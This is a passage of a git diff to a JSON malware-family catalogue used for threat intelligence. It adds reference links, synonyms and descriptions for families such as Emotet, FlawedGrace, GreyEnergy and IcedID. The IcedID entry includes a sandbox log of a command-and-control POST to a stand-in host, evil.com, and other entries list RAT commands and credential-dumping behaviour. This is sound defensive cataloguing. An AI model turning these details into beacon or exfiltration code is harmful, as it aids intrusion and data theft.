"https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html", + "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1", + "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", + "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/", + "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", + "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", + "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/", + "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html", + "https://persianov.net/emotet-malware-analysis-part-1", + "https://persianov.net/emotet-malware-analysis-part-2", + "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol", + "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/", + "https://paste.cryptolaemus.com", + "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", + "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/", + "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader", + "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", + "https://feodotracker.abuse.ch/?filter=version_e", + "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", + "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", + "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69" + ], + "synonyms": [ + "Geodo", + "Heodo" + ], + "type": [] + }, + "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", + "value": "Emotet" + }, { "description": "", "meta": { @@ -6530,6 +7794,20 @@ "uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc", "value": "EvilGrab" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilnum", + "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/", + "http://www.pwncode.club/2018/05/javascript-based-bot-using-github-c.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "da922c36-ca13-4ea2-a22d-471e91ddac93", + "value": "EVILNUM (Windows)" + }, { "description": "Privately modded version of the Pony stealer.", "meta": { @@ -6590,6 +7868,19 @@ "uuid": "74f8db32-799c-41e5-9815-6272908ede57", "value": "MS Exchange Tool" }, + { + "description": "ExileRAT is a simple RAT platform capable of getting information on the system (computer name, username, listing drives, network adapter, process name), getting/pushing files and executing/terminating processes.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.exilerat", + "https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c932a2f3-1470-4b0c-8412-2d081901277b", + "value": "Exile RAT" + }, { "description": "", "meta": { @@ -6696,6 +7987,19 @@ "uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034", "value": "FantomCrypt" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer", + "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f197b0a8-6bea-42ea-b57f-8f6f202f7602", + "value": "Farseer" + }, { "description": "", "meta": { @@ -6886,11 +8190,38 @@ "uuid": "1ab17959-6254-49af-af26-d34e87073e49", "value": "FirstRansom" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flame", + "https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c40dbede-490f-4df4-a242-a2461e3cfc4e", + "value": "Flame" + }, + { + "description": " FLASHFLOOD will scan inserted removable drives for targeted files, and copy those files from the\r\nremovable drive to the FLASHFLOOD-infected system. FLASHFLOOD may also log or copy additional data from the victim computer, such as system information\r\nor contacts.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0ce7e94e-da65-43e4-86f0-9a0bb21d1118", + "value": "FLASHFLOOD" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", + "https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930", "https://github.com/Coldzer0/Ammyy-v3", "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", @@ -6902,6 +8233,20 @@ "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4", "value": "FlawedAmmyy" }, + { + "description": "According to ProofPoint, FlawedGrace is written in C++ and can be categorized as a Remote Access Trojan (RAT). It seems to have been developed in the second half of 2017 mainly.\r\n\r\nFlawedGrace uses a series of commands:\r\nFlawedGrace also uses a series of commands, provided below for reference:\r\n* desktop_stat\r\n* destroy_os\r\n* target_download\r\n* target_module_load\r\n* target_module_load_external\r\n* target_module_unload\r\n* target_passwords\r\n* target_rdp\r\n* target_reboot\r\n* target_remove\r\n* target_script\r\n* target_servers\r\n* target_update\r\n* target_upload\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace", + "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ef591233-4246-414b-9fbd-46838f3e5da2", + "value": "FlawedGrace" + }, { "description": "", "meta": { @@ -6935,6 +8280,19 @@ "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", "value": "FlokiBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop", + "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0024c2d9-673f-4999-b240-4ae61a72c9b9", + "value": "FlowerShop" + }, { "description": "", "meta": { @@ -6990,6 +8348,8 @@ "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", + "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/", + "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf", "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent", "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" ], @@ -7033,6 +8393,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec", "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" ], @@ -7134,14 +8496,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", + "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/", "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/", "http://asec.ahnlab.com/1145", + "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", "https://isc.sans.edu/diary/23417", + "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html", "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", + "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", "http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf", "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/", "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom" @@ -7227,38 +8593,17 @@ "value": "GearInformer" }, { - "description": "", + "description": "According to FireEye, GEMCUTTER is used in a similar capacity as BACKBEND (downloader), but maintains persistence by creating a Windows registry run key.\r\nGEMCUTTER checks for the presence of the mutex MicrosoftGMMZJ to ensure only one copy of GEMCUTTER is executing. If the mutex doesn't exist, the malware creates it and continues execution; otherwise, the malware signals the MicrosoftGMMExit event.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.geodo", - "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", - "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", - "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", - "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", - "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/", - "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", - "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", - "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", - "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", - "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader", - "https://www.us-cert.gov/ncas/alerts/TA18-201A", - "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", - "https://feodotracker.abuse.ch/?filter=version_e", - "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", - "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html", - "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1" - ], - "synonyms": [ - "Emotet", - "Heodo" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gemcutter", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], + "synonyms": [], "type": [] }, - "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", - "value": "Geodo" + "uuid": "e46ae329-a619-4cfc-8059-af326c11ee79", + "value": "GEMCUTTER" }, { "description": "", @@ -7297,11 +8642,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole", "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/", - "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", - "https://www.coresecurity.com/core-impact" + "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf" ], "synonyms": [ - "CoreImpact (Modified)" + "CoreImpact (Modified)", + "Gholee" ], "type": [] }, @@ -7314,6 +8659,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet", "https://en.wikipedia.org/wiki/GhostNet", + "https://www.nartv.org/2019/03/28/10-years-since-ghostnet/", "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html" ], "synonyms": [ @@ -7352,7 +8698,8 @@ "http://www.malware-traffic-analysis.net/2018/01/04/index.html", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", "http://www.hexblog.com/?p=1248", - "https://blog.cylance.com/the-ghost-dragon" + "https://blog.cylance.com/the-ghost-dragon", + "https://www.intezer.com/blog-chinaz-relations/" ], "synonyms": [ "Gh0st RAT", @@ -7391,6 +8738,19 @@ "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c", "value": "GlassRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glitch_pos", + "https://blog.talosintelligence.com/2019/03/glitchpos-new-pos-malware-for-sale.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d2e0cbfb-c647-48ec-84e2-ca2199cf7d03", + "value": "GlitchPOS" + }, { "description": "", "meta": { @@ -7672,7 +9032,7 @@ "value": "Graftor" }, { - "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", + "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card\u2019s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", @@ -7716,6 +9076,19 @@ "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4", "value": "Gravity RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grease", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4ed079e6-69bd-481b-b873-86ced9ded750", + "value": "GREASE" + }, { "description": "", "meta": { @@ -7731,6 +9104,23 @@ "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", "value": "GreenShaitan" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy", + "https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/", + "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", + "https://www.eset.com/int/greyenergy-exposed/", + "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", + "https://github.com/NozomiNetworks/greyenergy-unpacker" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5a683d4f-31a1-423e-a136-d348910ca967", + "value": "GreyEnergy" + }, { "description": "", "meta": { @@ -7822,6 +9212,8 @@ "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html", + "https://www.uperesia.com/hancitor-packer-demystified", + "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/", "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", "https://boozallenmts.com/resources/news/closer-look-hancitor", "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/" @@ -7880,6 +9272,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", + "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html", "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/", "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", @@ -7888,6 +9281,7 @@ "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/" ], "synonyms": [ + "HawkEye Reborn", "Predator Pain" ], "type": [] @@ -7914,6 +9308,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" ], @@ -7955,7 +9350,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html" ], "synonyms": [], "type": [] @@ -7982,6 +9378,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", + "https://blog.dcso.de/enterprise-malware-as-a-service/", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" ], "synonyms": [], @@ -8096,7 +9493,7 @@ "value": "HLUX" }, { - "description": "", + "description": " a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry", @@ -8108,6 +9505,20 @@ "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d", "value": "homefry" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight", + "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A", + "https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3e489132-8687-46b3-b9a7-74ba8fafaddf", + "value": "HOPLIGHT" + }, { "description": "", "meta": { @@ -8198,7 +9609,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hworm", - "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412" + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412", + "http://blogs.360.cn/post/analysis-of-apt-c-37.html" ], "synonyms": [ "houdini" @@ -8222,19 +9634,23 @@ "value": "HyperBro" }, { - "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", + "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If \u201c/i\u201d is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If \u201c/I\u201d is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html", "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", "https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid", + "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/", "https://www.youtube.com/watch?v=wObF9n2UIAM", "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", "https://www.youtube.com/watch?v=7Dk7NkIbVqY", + "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/", "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", - "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" + "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", + "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" ], "synonyms": [ "BokBot" @@ -8330,6 +9746,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat", + "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/" ], "synonyms": [], @@ -8383,24 +9800,49 @@ "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420", "value": "InvisiMole" }, + { + "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary 